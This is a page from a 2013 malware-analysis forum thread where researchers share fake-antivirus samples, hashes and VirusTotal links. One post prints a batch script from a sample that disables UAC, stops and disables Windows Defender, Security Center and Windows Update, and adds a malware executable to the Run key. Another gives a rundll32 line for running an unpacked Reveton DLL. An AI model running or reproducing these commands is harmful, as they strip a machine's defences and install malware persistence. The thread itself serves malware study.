A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #20233  by p4r4n0id
 Sat Jul 27, 2013 8:07 am
attached!
Attachments
pwd: infected
(474.32 KiB) Downloaded 85 times
 #20236  by Xylitol
 Sat Jul 27, 2013 12:52 pm
Attachments
infected
(474.48 KiB) Downloaded 89 times
 #20334  by Cody Johnston
 Thu Aug 01, 2013 8:45 pm
Attentive Antivirus

Image

There were a few other goodies packaged with this as well

There are some other files in here as well:

1. 3X9DV7p6.exe
MD5: e7a7fb4d2c8b8d9594582618f099e337
https://www.virustotal.com/en/file/2691 ... 375387434/

2. 1891695800740633560.exe
MD5: c9d3ab7fa4d7ab64acebfa518ecb88bb
https://www.virustotal.com/en/file/2ac4 ... 375387391/

Some batch file found in the folder (Mad Skillz):
Code: Select all
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe
There are other files in the attach but those are most interesting.
Attachments
Password: infected
(689.95 KiB) Downloaded 103 times
 #20345  by ISergey256
 Fri Aug 02, 2013 1:09 pm
Live Security Professional
to run -> rundll32 DUMP_003E0000-003EF000_unpack_reveton.dll, XFG00

original https://www.virustotal.com/ru/file/410f ... /analysis/
unpacked https://www.virustotal.com/ru/file/2f8c ... /analysis/
fakeav memory dump https://www.virustotal.com/ru/file/3f12 ... /analysis/

activation code F9292-QRT38-U9291-29291-3923F
Attachments
pass: infected
(1008.22 KiB) Downloaded 104 times
  • 1
  • 6
  • 7
  • 8
  • 9
  • 10
  • 15